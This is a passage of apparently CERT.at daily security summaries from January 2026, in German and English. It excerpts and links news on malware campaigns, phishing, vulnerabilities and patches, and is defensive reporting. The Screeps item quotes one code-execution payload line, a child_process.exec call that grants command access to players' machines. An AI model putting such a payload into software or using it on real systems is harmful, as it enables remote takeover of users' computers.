Das Framework Apache Hadoop ist verwundbar. Attacken können im Kontext des HDFS-Dateisystems geschehen. Ein Sicherheitspatch ist verfügbar.

https://heise.de/-11155241

Vulnerabilities

DSA-6112-1 openjdk-21 - security update

https://lists.debian.org/debian-security-announce/2026/msg00021.html

DSA-6111-1 imagemagick - security update

https://lists.debian.org/debian-security-announce/2026/msg00020.html

Security Vulnerabilities fixed in Firefox 147.0.2

https://www.mozilla.org/en-US/security/advisories/mfsa2026-06/

Kubernetes Remote Code Execution Via Nodes/Proxy GET Permission

https://grahamhelton.com/blog/nodes-proxy-rce

Tageszusammenfassung - 26.01.2026

2026-01-26T18:59:21Z

End-of-Day report

Timeframe: Freitag 23-01-2026 18:00 - Montag 26-01-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Guenes Holler

News

Hackers can bypass npm-s Shai-Hulud defenses via Git dependencies

The defense mechanisms that NPM introduced after the Shai-Hulud supply-chain attacks have weaknesses that allow threat actors to bypass them via Git dependencies. [..] the vulnerabilities were discovered in multiple utilities in the JavaScript ecosystem that allow managing dependencies, like pnpm, vlt, Bun, and NPM. [..] They say that the problems were addressed in all tools except for NPM, who closed the report stating that the behavior "works as expected."

https://www.bleepingcomputer.com/news/security/hackers-can-bypass-npms-shai-hulud-defenses-via-git-dependencies/

Nearly 800,000 Telnet servers exposed to remote attacks

Internet security watchdog Shadowserver tracks nearly 800,000 IP addresses with Telnet fingerprints amid ongoing attacks exploiting a critical authentication bypass vulnerability in the GNU InetUtils telnetd server.

https://www.bleepingcomputer.com/news/security/nearly-800-000-telnet-servers-exposed-to-remote-attacks/

Konni Hackers Deploy AI-Generated PowerShell Backdoor Against Blockchain Developers

As recently as this month, Konni has been observed distributing spear-phishing emails containing malicious links that are disguised as harmless advertising URLs associated with Google and Naver's advertising platforms to bypass security filters and deliver a remote access trojan codenamed EndRAT. [..] The email messages have been found to masquerade as financial notices, such as transaction confirmations or wire transfer requests, to trick recipients into downloading ZIP archives hosted on WordPress sites. The ZIP file comes with a Windows shortcut (LNK) that's designed to execute an AutoIt script disguised as a PDF document.

https://thehackernews.com/2026/01/konni-hackers-deploy-ai-generated.html

Malicious VS Code AI Extensions with 1.5 Million Installs Steal Developer Source Code

Cybersecurity researchers have discovered two malicious Microsoft Visual Studio Code (VS Code) extensions that are advertised as artificial intelligence (AI)-powered coding assistants [..] The extensions, which have 1.5 million combined installs and are still available for download from the official Visual Studio Marketplace, are listed below - ChatGPT - *** [..] ChatGPT - ChatMoss

https://thehackernews.com/2026/01/malicious-vs-code-ai-extensions-with-15.html

BitLocker: Microsoft gibt Schlüssel an Strafverfolger heraus

Wer seine Festplatte oder SSD verschlüsselt, darf eigentlich davon ausgehen, dass nur er diese auch wieder entschlüsseln kann. Bei der Verschlüsselungstechnologie BitLocker von Microsoft scheint dies aber nicht unbedingt der Fall zu sein, weil das Unternehmen den Schlüssel in der Home-Edition von Windows automatisch im Online-Account des Nutzers abspeichert.

https://www.heise.de/news/Microsoft-gibt-BitLocker-Schluessel-an-Strafverfolgungsbehoerden-11152988.html

Microsoft SharePoint/OneDrive: IDCRL-Authentication endet ab 31. Jan. 2026 - OpenID Connect und OAuth kommt (MC1184649)

Microsoft lässt bei den Online-Versionen das IDCRL-Authentication Protocol zum 31. Januar 2026 auslaufen. Die Authentifizierung erfolgt dann über OpenID Connect und OAuth - lässt sich aber noch einige Wochen wieder umstellen. Microsoft hat die Änderung bereits im November 2025 angekündigt, das Ganze aber als Erinnerung nochmals zum 20. Januar 2026 im Microsoft 365 Message Center unter MC1184649 - Microsoft SharePoint: Retirement of IDCRL authentication protocol and enforcement of OpenID Connect and OAuth protocols eingestellt.

https://borncity.com/blog/2026/01/25/microsoft-sharepoint-onedrive-idcrl-authentication-endet-ab-31-jan-2026-openid-connect-und-oauth-kommt-mc1184649/

$6,000 -Stanley- Toolkit Sold on Russian Forums Fakes Secure URLs in Chrome

Varonis researchers discovered that Stanley uses a clever trick of disguising itself as a simple note-taking tool called Notely. Once a person installs it, the app can display a fake login page directly over a real website. [..] What is most concerning for the average user is that this toolkit isn-t just a piece of software but a full-featured service. The most expensive version comes with a guarantee that the malicious app will pass the official security checks of the Chrome Web Store.

https://hackread.com/stanley-toolkit-russia-forum-fakes-chrome-urls/

New Fake CAPTCHA Scam Abuses Microsoft Tools to Install Amatera Stealer

Blackpoint Cyber discovered a new Fake CAPTCHA campaign that tricks users into installing Amatera Stealer. By abusing legitimate Microsoft scripts and hiding malicious code in Google Calendar and PNG images, this attack bypasses standard security to harvest private passwords and browser data.

https://hackread.com/fake-captcha-scam-microsoft-tools-amatera-stealer/

F5: K000159681: Credential harvesting campaign targeting F5 VPN users

On January 13, 2026, researchers identified a large-scale credential harvesting campaign targeting several VPN providers, including F5. The threat actors behind the campaign registered numerous doppelgänger domains designed to mimic legitimate F5 domains. These domains are used to deceive victims into downloading counterfeit BIG-IP VPN client installers. [..] IOCs, C2 servers, and the malicious script hash value

https://my.f5.com/manage/s/article/K000159681

Screeps: How a game about programming exposed thousands of players to remote code execution

In Screeps (short for "Scripting Creeps"), you cannot click on a unit ("creep") and tell it what to do. If you place a building on the map, your builders will stand next to it and do nothing. There are no buttons to give your creeps instructions. Instead, you must write code to define their behavior. [..] In Multiplayer Screeps worlds, all of the code to progress the game runs on the server, including the AI for your units. [..] Screeps is on Steam, and the native client reuses the browser code but with no sandboxing. nw.require('child_process').exec('your command here') will get you full command line access to the target machine. [..] It is fixed now, which was the primary goal of my writing this.

https://outsidetheasylum.blog/screeps/

The end of the curl bug-bounty

There is no longer a curl bug-bounty program. It officially stops on January 31, 2026. [..] We saw an explosion in AI slop reports combined with a lower quality even in the reports that were not obvious slop - presumably because they too were actually misled by AI but with that fact just hidden better. [..] The never-ending slop submissions take a serious mental toll to manage and sometimes also a long time to debunk.

https://daniel.haxx.se/blog/2026/01/26/the-end-of-the-curl-bug-bounty/

Vulnerabilities

Hands-Free Lockpicking: Critical Vulnerabilities in dormakaba-s Physical Access Control System

In this post, Clemens Stockenreitner and Werner Schober of the SEC Consult Vulnerability Lab highlight several critical vulnerabilities found in dormakaba-s physical access control systems based on exos 9300. This access control system originates from the manufacturer's enterprise product line for door and access systems and is predominantly used by large enterprises in Europe, including industrial and service companies, logistics operators, energy providers, and airport operators.

https://sec-consult.com/blog/detail/hands-free-lockpicking-critical-vulnerabilities-in-dormakabas-physical-access-control-system/

Security updates for Monday

Security updates have been issued by AlmaLinux (gimp, glib2, go-toolset:rhel8, golang, java-17-openjdk, java-21-openjdk, kernel, net-snmp, pcs, and thunderbird), Debian (apache2, imagemagick, incus, inetutils, libuev, openjdk-17, php7.4, python3.9, shapelib, taglib, and zvbi), Fedora (mingw-glib2, mingw-harfbuzz, mingw-libsoup, mingw-openexr, pgadmin4, python3.11, python3.12, python3.9, and wireshark), Gentoo (Asterisk, Commons-BeanUtils, GIMP, inetutils, and Vim, gVim), Mageia (kernel), Oracle (glib2, java-17-openjdk, java-21-openjdk, and libpng), Red Hat (java-17-openjdk, java-21-openjdk, kernel, and kernel-rt), SUSE (azure-cli-core, bind, buildah, chromium, coredns, glib2, harfbuzz, kernel, kernel-firmware, libheif, libvirt, openCryptoki, openvswitch, podman, python, python-urllib3, rabbitmq-server, and vlang), and Ubuntu (cjson).

https://lwn.net/Articles/1055958/

Beckhoff Security Advisory 2025-003: Vulnerabilities in Beckhoff Device Manager

https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2025-003.pdf

Tageszusammenfassung - 23.01.2026

2026-01-23T18:25:27Z

End-of-Day report

Timeframe: Donnerstag 22-01-2026 18:00 - Freitag 23-01-2026 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer

News

Analysis of Single Sign On (SSO) abuse on FortiOS

Fortinet product security has identified the issue, and the company is working on a fix to remediate this occurrence. An advisory will be issued as the fix scope and timeline is available. It is important to note that while, at this time, only exploitation of FortiCloud SSO has been observed, this issue is applicable to all SAML SSO implementations. In the meantime, Fortinet recommends taking the mitigating actions described below.

https://feeds.fortinet.com/~/941387753/0/fortinet/blogs~Analysis-of-Single-Sign-On-SSO-abuse-on-FortiOS

Okta SSO accounts targeted in vishing-based data theft attacks

Okta is warning about custom phishing kits built specifically for voice-based social engineering (vishing) attacks. BleepingComputer has learned that these kits are being used in active attacks to steal Okta SSO credentials for data theft.

https://www.bleepingcomputer.com/news/security/okta-sso-accounts-targeted-in-vishing-based-data-theft-attacks/

Datenlecks analysiert: Solche Passwörter sollten Nutzer besser meiden

Forscher haben rund sechs Milliarden Passwörter aus mehreren Datenlecks untersucht. Ihr Bericht zeigt Muster auf, die besonders häufig vorkommen.

https://www.golem.de/news/datenlecks-analysiert-solche-passwoerter-sollten-nutzer-besser-meiden-2601-204548.html

Phishing Attack Uses Stolen Credentials to Install LogMeIn RMM for Persistent Access

Cybersecurity researchers have disclosed details of a new dual-vector campaign that leverages stolen credentials to deploy legitimate Remote Monitoring and Management (RMM) software for persistent remote access to compromised hosts. [..] The attack unfolds in two distinct waves, where the threat actors leverage fake invitation notifications to steal victim credentials, and then leverage those pilfered credentials to deploy RMM tools to establish persistent access.

https://thehackernews.com/2026/01/phishing-attack-uses-stolen-credentials.html

Crims compromised energy firms Microsoft accounts, sent 600 phishing emails

Unknown attackers are abusing Microsoft SharePoint file-sharing services to target multiple energy-sector organizations, harvest user credentials, take over corporate inboxes, and then send hundreds of phishing emails from compromised accounts to contacts inside and outside those organizations. The attackers likely used previously-compromised email addresses to gain initial access to "multiple" energy-sector organizations targeted in this campaign, according to Redmond, which detailed the digital intrusions in a Wednesday report.

https://go.theregister.com/feed/www.theregister.com/2026/01/22/crims_compromised_energy_firms_microsoft/

149 Million Usernames and Passwords Exposed by Unsecured Database

This -dream wish list for criminals- includes millions of Gmail, Facebook, banking logins, and more. The researcher who discovered it suspects they were collected using infostealing malware.

https://www.wired.com/story/149-million-stolen-usernames-passwords/

URL fritz.box leitet seit 22.1.2026 auf 91.195.240.12 um

Die von der früheren AVM, heute FRITZ, erworbene Domain fritz.box ist wohl wieder auf "Abwegen". [..] Die Whois-Daten zeigen, dass heute (22.1.2026) die Domain-Registrierung abgelaufen ist.

https://borncity.com/blog/2026/01/22/url-fritz-box-leitet-seit-22-1-2026-auf-91-195-240-12-um/

KI und Security: Zero-Day-Exploits durch KI sind bereits Realität

Eine Studie zeigt: KIs können komplexe Zero-Day-Exploits erstellen. Die Folge: Die Suche nach Sicherheitslücken wird erfolgreich industrialisiert und skaliert.

https://heise.de/-11151838

Exploit Cursor Agents to create persistent, distributed threats

Yesterday a VSCode exploit was written up. When a programmer simply opens a folder that contains a malicious tasks.json file, the malicious code will silently run from inside the editor itself - where all their work lives. That got me thinking: could I use this to re-program a developer's AI agents and get them to do what I want? Even worse - could I do this to all their code repositories? Turns out: hell yes.

https://ike.io/open-a-folder-all-your-agents-are-mine/

Vulnerabilities

Security updates for Friday

Security updates have been issued by AlmaLinux (kernel), Debian (bind9, chromium, osslsigncode, and python-urllib3), Fedora (freerdp, ghostscript, hcloud, rclone, rust-rkyv0.7, rust-rkyv_derive0.7, and vsftpd), Mageia (avahi and harfbuzz), SUSE (alloy, avahi, busybox, cargo-c, corepack22, corepack24, curl, docker, dpdk, exiv2-0_26, ffmpeg-4, firefox, glib2, go1.24, go1.25, gpg2, haproxy, kernel, kernel-firmware, keylime, libpng16, librsvg, libsodium, libsoup, libsoup2, libtasn1, log4j, net-snmp, open-vm-tools, openldap2_5, ovmf, pgadmin4, php7, podman, python-filelock, python-marshmallow, python-pyasn1, python-tornado, python-urllib3, python-virtualenv, python3, python311-pyasn1, python311-weasyprint, rust1.91, rust1.92, util-linux, webkit2gtk3, and wireshark), and Ubuntu (libxml2 and pyasn1).

https://lwn.net/Articles/1055671/

Videokonferenzsoftware: Zoom Node möglicher Ansatzpunkt für Schadcode-Attacken

In einer Warnmeldung führen die Entwickler aus, dass die nun geschlossene Sicherheitslücke (CVE-2026-22844) mit dem Bedrohungsgrad -kritisch- eingestuft ist. Die Schwachstelle betrifft konkret die Komponente Multimedia Routers (MMRs). Damit eine Attacke gelingt, muss ein Angreifer Teilnehmer eines Meetings sein. Ist das gegeben, kann er auf einem nicht näher beschriebenen Weg Schadcode ausführen.

https://heise.de/-11151434

Rockwell Automation CompactLogix 5370

https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-03

Schneider Electric EcoStruxure Process Expert

https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-01

EVMAPA

https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08

Weintek cMT X Series HMI EasyWeb Service

https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-05

Delta Electronics DIAView

https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-07

Johnson Controls Inc. iSTAR Configuration Utility (ICU) tool

https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-04

AutomationDirect CLICK Programmable Logic Controller

https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-02

Hubitat Elevation Hubs

https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-06

Tageszusammenfassung - 22.01.2026

2026-01-22T18:11:51Z

End-of-Day report

Timeframe: Mittwoch 21-01-2026 18:00 - Donnerstag 22-01-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Guenes Holler

News

A patch for the NIS2 Directive

On January 20th, 2026 the EU Commission presented a package of legislative proposals, including an update to the NIS2 directive.

https://www.cert.at/en/blog/2026/1/a-patch-for-the-nis2-directive

Look at FortiCloud SSO Bypass Exploitation (CVE-2025-59718/59719)

In December last year, Fortinet disclosed [1] a vulnerability in SAML processing, which allowed full bypass of authentication to management interfaces with FortiCloud SSO enabled. According to new, still not officially confirmed reports, the vulnerability may not have been fully patched [10]. As affected devices are represented in my small high-interactive honeypots network, we have an opportunity to take a look at what the attackers do.

https://www.cert.at/en/blog/2026/1/look-at-forticloud-sso-bypass-exploitation

New Android malware uses AI to click on hidden browser ads

A new family of Android click-fraud trojans leverages TensorFlow machine learning models to automatically detect and interact with specific advertisement elements.

https://www.bleepingcomputer.com/news/security/new-android-malware-uses-ai-to-click-on-hidden-browser-ads/

Chainlit AI framework bugs let hackers breach cloud environments

Two high-severity vulnerabilities in Chainlit, a popular open-source framework for building conversational AI applications, allow reading any file on the server and leaking sensitive information.

https://www.bleepingcomputer.com/news/security/chainlit-ai-framework-bugs-let-hackers-breach-cloud-environments/

Is AI-Generated Code Secure?, (Thu, Jan 22nd)

The title of this diary is perhaps a bit catchy but the question is important. I don-t consider myself as a good developer. That-s not my day job and I-m writing code to improve my daily tasks. I like to say -I-m writing sh*ty code! It works for me, no warranty that it will for for you-. Today, most of my code (the skeleton of the program) is generated by AI, probably like most of you.

https://isc.sans.edu/diary/rss/32648

Malicious PyPI Package Impersonates SymPy, Deploys XMRig Miner on Linux Hosts

A new malicious package discovered in the Python Package Index (PyPI) has been found to impersonate a popular library for symbolic mathematics to deploy malicious payloads, including a cryptocurrency miner, on Linux hosts.

https://thehackernews.com/2026/01/malicious-pypi-package-impersonates.html

Preparing for the EU Cyber Resilience Act (CRA)

Product security has matured significantly over the last decade. Secure defaults, defined ownership of security risk, reliable update mechanisms, and structured vulnerability handling are now mainstream and well understood by experienced engineering and security teams. These practices are no longer aspirational. They are now the minimum required to build and operate digital products responsibly.

https://www.pentestpartners.com/security-blog/preparing-for-the-eu-cyber-resilience-act-cra/

Phishing-Falle: Verlust des Zugriffs auf ChatGPT

Eine aktuell kursierende Phishing-Mail warnt vor einer Kündigung des ChatGPT-Kontos. Schuld sei eine ausgebliebene Zahlung. Das Problem ließe sich aber mit einer Aktualisierung der notwendigen Daten aus der Welt schaffen. Wer dem entsprechenden Pfad folgt, übermittelt den Kriminellen allerdings Kreditkarten- und Kontaktinformationen.

https://www.watchlist-internet.at/news/phishing-falle-chatgpt/

European Space Agency-s cybersecurity in freefall as yet another breach exposes spacecraft and mission data

It has just been a few weeks since reports emerged of the Christmas cyber attack suffered by the European Space Agency (ESA), and the situation has already become worse.

https://www.bitdefender.com/en-us/blog/hotforsecurity/european-space-agencys-cybersecurity-in-freefall-as-yet-another-breach-exposes-spacecraft-and-mission-data

The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time

Imagine visiting a webpage that looks perfectly safe. It has no malicious code, no suspicious links. Yet, within seconds, it transforms into a personalized phishing page.

https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/

Osiris: New Ransomware, Experienced Attackers?

Poortry driver and modified Rustdesk tool used in recent attack campaign, which bears similarities to previous Inc ransomware attacks.

https://www.security.com/threat-intelligence/new-ransomware-osiris

Watering Hole Attack Targets EmEditor Users with Information-Stealing Malware

TrendAI- Research provides a technical analysis of a compromised EmEditor installer used to deliver multistage malware that performs a range of malicious actions.

https://www.trendmicro.com/en_us/research/26/a/watering-hole-attack-targets-emeditor-users.html

Cyber Is What We Make of It

Cyber Is What We Make of It "Its not what happens to you, but how you react to it that matters." - EpictetusNot long ago an Atlantic Council op-ed in CyberScoop outlined ten key reforms to close Americas cybersecurity gaps. The recommendations are sensible: migrate to memory-safe languages, apply formal verification to critical systems, establish zero trust architectures, build data resilience, conduct proactive threat hunting. Laudable, uncontroversial, and comprehensive;

https://buttondown.com/grugq/archive/cyber-is-what-we-make-of-it/

Vulnerabilities

SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release

A new security flaw in SmarterTools SmarterMail email software has come under active exploitation in the wild, two days after the release of a patch.

https://thehackernews.com/2026/01/smartermail-auth-bypass-exploited-in.html

Security updates for Thursday

Security updates have been issued by AlmaLinux (gpsd), Debian (inetutils and modsecurity-crs), Fedora (cpp-httplib, curl, mariadb11.8, mingw-libtasn1, mingw-libxslt, mingw-python3, rclone, and rpki-client), Oracle (gimp, glib2, go-toolset:rhel8, golang, kernel, mariadb-devel:10.3, and thunderbird), Red Hat (buildah, go-toolset:rhel8, golang, grafana, kernel, kernel-rt, multiple packages, openssl, osbuild-composer, podman, and skopeo), Slackware (bind), SUSE (ffmpeg-4, libsodium, libvirt, net-snmp, open-vm-tools, ovmf, postgresql17, postgresql18, python-FontTools, python-weasyprint, and webkit2gtk3), and Ubuntu (glib2.0 and opencc).

https://lwn.net/Articles/1055484/

Jetzt handeln! Angreifer umgehen offenbar Fortinet-Sicherheitspatch

Medienberichten zufolge ist ein Sicherheitspatch für diverse Fortinet-Produkte defekt. Admins können Instanzen aber trotzdem schützen.

https://heise.de/-11149777

Updaten! Angriffsversuche auf Sicherheitslücken in Cisco Unified Communications

In mehreren Unified-Communications-Produkten von Cisco klafft eine Sicherheitslücke, die Angreifern ohne Anmeldung das Einschleusen von Schadcode aus dem Netz und dessen Ausführung mit Root-Rechten ermöglicht. Admins sollten die bereitstehenden Aktualisierungen zügig anwenden, da Cisco bereits Angriffsversuche aus dem Netz auf die Schwachstelle beobachtet hat.

https://heise.de/-11149877

Dell Data Protection Advisor über unzählige Sicherheitslücken angreifbar

Dell schließt teilweise sechzehn Jahre alte Schwachstellen in Data Protection Advisor, über die Angreifer Systeme kompromittieren können.

https://heise.de/-11150421

SSA-864900 V1.6 (Last Update: 2026-01-22): Multiple Vulnerabilities in Fortigate NGFW on RUGGEDCOM APE1808 Devices

https://cert-portal.siemens.com/productcert/html/ssa-864900.html

Tageszusammenfassung - 21.01.2026

2026-01-21T18:41:58Z

End-of-Day report

Timeframe: Dienstag 20-01-2026 18:00 - Mittwoch 21-01-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Guenes Holler

News

EU plans cybersecurity overhaul to block foreign high-risk suppliers

The European Commission has proposed new cybersecurity legislation mandating the removal of high-risk suppliers to secure telecommunications networks and strengthening defenses against state-backed and cybercrime groups targeting critical infrastructure.

https://www.bleepingcomputer.com/news/security/eu-plans-cybersecurity-overhaul-to-block-foreign-high-risk-suppliers/

VoidLink cloud malware shows clear signs of being AI-generated

The recently discovered cloud-focused VoidLink malware framework is believed to have been developed by a single person with the help of an artificial intelligence model.

https://www.bleepingcomputer.com/news/security/voidlink-cloud-malware-shows-clear-signs-of-being-ai-generated/

Hackers exploit security testing apps to breach Fortune 500 firms

Threat actors are exploiting misconfigured web applications used for security training and internal penetration testing, such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP, to gain access to cloud environments of Fortune 500 companies and security vendors.

https://www.bleepingcomputer.com/news/security/hackers-exploit-security-testing-apps-to-breach-fortune-500-firms/

Mass Spam Attacks Leverage Zendesk Instances

The CRM vendor advised ignoring or deleting suspicious emails and said the attacks were not tied to any breach or software vulnerability.

https://www.darkreading.com/threat-intelligence/mass-spam-attacks-zendesk-instances

Jetzt abschalten: Zehn Jahre alte Telnetd-Lücke macht jeden Client zum Root

Seit 2015 kann sich über Telnetd jeder Client einen Root-Zugriff verschaffen. Einen Patch gibt es zwar, empfohlen wird jedoch die Abschaltung.

https://www.golem.de/news/jetzt-abschalten-zehn-jahre-alte-telnetd-luecke-macht-jeden-client-zum-root-2601-204433.html

LastPass Warns of Fake Maintenance Messages Targeting Users- Master Passwords

LastPass is alerting users to a new active phishing campaign that's impersonating the password management service, which aims to trick users into giving up their master passwords.

https://thehackernews.com/2026/01/lastpass-warns-of-fake-maintenance.html

Curl shutters bug bounty program to remove incentive for submitting AI slop

The maintainer of popular open-source data transfer tool cURL has ended the project-s bug bounty program after maintainers struggled to assess a flood of AI-generated contributions.

https://go.theregister.com/feed/www.theregister.com/2026/01/21/curl_ends_bug_bounty/

Einschränkung der Anzeigenauslieferung auf Facebook? Unternehmens-Profile im Visier von Kriminellen

Mit vermeintlich vom Meta-Konzern stammenden E-Mails versuchen Betrüger:innen, sich Zugang zu Unternehmens-Accounts zu erschleichen. Dafür haben sie eine gefälschte Login-Seite gebaut. Wie läuft die Masche konkret ab? Woran ist die Betrugsabsicht zu erkennen? Dieser Artikel liefert Antworten.

https://www.watchlist-internet.at/news/einschraenkung-der-anzeigenauslieferung-facebook/

DNS OverDoS: Are Private Endpoints Too Private?

We discovered an aspect of Azure-s Private Endpoint architecture that could expose Azure resources to denial of service (DoS) attacks. In this article, we explore how both intentional and inadvertent acts could result in limited access to Azure resources through the Azure Private Link mechanism. We uncovered this issue while investigating irregular behavior in Azure test environments.

https://unit42.paloaltonetworks.com/dos-attacks-and-azure-private-endpoint/

IT-Sicherheit: Roter Draht zwischen Peking und London

Ein neues, geheimes Forum soll die Kommunikation zwischen britischen und chinesischen Diensten verbessern. Es könnte das erste seiner Art sein.

https://heise.de/-11148209

Introducing > PowerShell.Exposed

PowerShell (PS) isn-t just a -Windows admin tool.- Once shell access is established, this is the cheapest and most powerful hands-on-keyboard control an attacker can have.

https://detect.fyi/introducing-powershell-exposed-4974fe712117?source=rssd5fd8f494f6a4

New EU Vulnerability Platform GCVE Goes Live, Reducing Reliance on Global Systems

Europe-s long-running conversation about digital autonomy quietly crossed a milestone with the launch of a new public vulnerability platform. The EU Vulnerability Database, created under the GCVE initiative, is now live. This signals a deliberate shift in how software weaknesses are identified, cataloged, and shared across Europe.

https://thecyberexpress.com/eu-launches-gcve-vulnerability-database/

Critical Vulnerability in Advanced Custom Fields: Extended Plugin Puts 100,000 WordPress Sites at Risk

A critical security flaw has been discovered in a widely used ACF add-on plugin for WordPress, placing up to 100,000 websites at risk of a full site takeover. The vulnerability affects the Advanced Custom Fields: Extended plugin, an add-on designed to extend the functionality of the popular Advanced Custom Fields ecosystem. An advisory issued about the flaw assigns a severity rating of 9.8, emphasizing the serious impact it can have if exploited.

https://thecyberexpress.com/acf-add-on-vulnerability-wordpress/

Vulnerabilities

Aktuelle Angriffswelle gegen CVE-2025-59718, Patches unzureichend

Im Dezember des vergangenen Jahres hat Fortinet Informationen über einen Login Bypass in mehreren Produkten des Unternehmens veröffentlicht (siehe dazu auch unser Warning vom 19.12.2025) und gleichzeitig Patches zur Verfügung gestellt welche das Problem beheben sollten.

https://www.cert.at/de/aktuelles/2026/1/aktuelle-angriffswelle-gegen-cve-2025-59718-patch-unzureichend

GitLab Patch Release: 18.8.2, 18.7.2, 18.6.4

Learn more about GitLab Patch Release: 18.8.2, 18.7.2, 18.6.4 for GitLab Community Edition (CE) and Enterprise Edition (EE).

https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/#cve-2026-0723unchecked-return-value-issue-in-authentication-services-impacts-gitlab-ceee

Sicherheitslücken: Nvidia CUDA Toolkit lässt Schadcode passieren

Nvidias Programmierschnittstelle CUDA weist Sicherheitslücken auf, wodurch unter anderem Schadcode auf Systeme gelangen kann. Davon sind je nach Sicherheitslücke Linux und Windows bedroht. Eine reparierte Ausgabe von CUDA Toolkit schafft Abhilfe.

https://www.heise.de/news/Sicherheitsluecken-Nvidia-CUDA-Toolkit-laesst-Schadcode-passieren-11148301.html

Sicherheitspatches: Atlassian sichert Confluence & Co. gegen mögliche Attacken

Atlassian hat für Bamboo, Bitbucket, Confluence, Crowd, Jira und Jira Service Management Data Center und Server wichtige Sicherheitsupdates veröffentlicht. Nach erfolgreichen Attacken können Angreifer in erster Linie DoS-Zustände und somit Abstürze auslösen.

https://www.heise.de/news/Sicherheitspatches-Atlassian-sichert-Confluence-Co-gegen-moegliche-Attacken-11149011.html

Security updates for Wednesday

Security updates have been issued by AlmaLinux (brotli and container-tools:rhel8), Debian (python-keystonemiddleware and python3.9), Fedora (cef, freerdp, golang-github-tetratelabs-wazero, and libpcap), Oracle (brotli, gpsd, kernel, and transfig), Red Hat (freerdp, golang, java-11-openjdk with Extended Lifecycle Support, libpng, libssh, mingw-libpng, and runc), SUSE (abseil-cpp, alloy, apache2, bind, cpp-httplib, curl, erlang, firefox, gpg2, grafana, haproxy, hauler, hawk2, libblkid-devel, libpng16, libraylib550, python-keystonemiddleware-doc, python-uv, python-weasyprint, squid, and tomcat), and Ubuntu (crawl and iperf3).

https://lwn.net/Articles/1055322/

VU#458022: Open5GS WebUI uses a hard-coded secrets including JSON Web Token signing key

https://kb.cert.org/vuls/id/458022

VU#102648: Code Injection Vulnerability in binary-parser library

https://kb.cert.org/vuls/id/102648

VU#481830: libheif Uncompressed Codec Lacks Bounds Check Leading to Application Crash

https://kb.cert.org/vuls/id/481830

Oracle Critical Patch Update Advisory - January 2026

https://www.oracle.com/security-alerts/cpujan2026.html

Cisco Unified Communications Products Remote Code Execution Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voice-rce-mORhqY4b

Schneider Electric EcoStruxure Foxboro DCS

https://www.cisa.gov/news-events/ics-advisories/icsa-26-020-01

Rockwell Automation Verve Asset Manager

https://www.cisa.gov/news-events/ics-advisories/icsa-26-020-03

Schneider Electric devices using CODESYS Runtime

https://www.cisa.gov/news-events/ics-advisories/icsa-26-020-02

Tageszusammenfassung - 20.01.2026

2026-01-20T18:31:21Z

End-of-Day report

Timeframe: Montag 19-01-2026 18:00 - Dienstag 20-01-2026 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer

News

Google Gemini Prompt Injection Flaw Exposed Private Calendar Data via Malicious Invites

Cybersecurity researchers have disclosed details of a security flaw that leverages indirect prompt injection targeting Google Gemini as a way to bypass authorization guardrails and use Google Calendar as a data extraction mechanism.

https://thehackernews.com/2026/01/google-gemini-prompt-injection-flaw.html

Cloudflare Fixes ACME Validation Bug Allowing WAF Bypass to Origin Servers

Cloudflare has addressed a security vulnerability impacting its Automatic Certificate Management Environment (ACME) validation logic that made it possible to bypass security controls and access origin servers. [..] The web infrastructure company said it found no evidence that the vulnerability was ever exploited in a malicious context. [..] The vulnerability was addressed by Cloudflare on October 27, 2025, with a code change that serves the response and disables WAF features only when the request matches a valid ACME HTTP-01 challenge token for that hostname.

https://thehackernews.com/2026/01/cloudflare-fixes-acme-validation-bug.html

Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading

Cybersecurity researchers have uncovered a new phishing campaign that exploits social media private messages to propagate malicious payloads, likely with the intent to deploy a remote access trojan (RAT).

https://thehackernews.com/2026/01/hackers-use-linkedin-messages-to-spread.html

EU-Kommission arbeitet an Open-Source-Strategie und fragt Community nach Feedback

Einzelpersonen und Gruppen haben bis zum 3. Februar Zeit, um Hinweise einzureichen.

https://www.derstandard.at/story/3000000304870/eu-kommission-arbeitet-an-open-source-strategie-und-fragt-community-nach-feedback

Microsoft & Anthropic MCP Servers At Risk of RCE, Cloud Takeovers

Researchers found the popular model context protocol (MCP) servers, which are integral components of AI services, carry serious vulnerabilities. [..] When they analyzed more than 7,000 MCP servers, they found that the same SSRF exposure might be latent in around 36.7% of all MCP servers on the Web today. [..] The company reported its findings to Anthropic last June. Half a year later, in December, Anthropic released the 2025.12.18 version of the Git MCP server, which better enforced path validation (in response to CVE-2025-68145), addressed argument handling (CVE-2025-68144), and completely removed the git_init tool (CVE-2025-68143).

https://www.darkreading.com/application-security/microsoft-anthropic-mcp-servers-risk-takeovers

Inside a Multi-Stage Windows Malware Campaign

The attack begins with social engineering lures delivered via business-themed documents crafted to appear routine and benign. These documents and accompanying scripts serve as visual distractions, diverting victims to fake tasks or status messages while malicious activity runs silently in the background.

https://feeds.fortinet.com/~/940900697/0/fortinet/blogs~Inside-a-MultiStage-Windows-Malware-Campaign

Vulnerabilities

Sicherheitslücke bei TP-Link: Überwachungskameras per Passwort-Reset knackbar

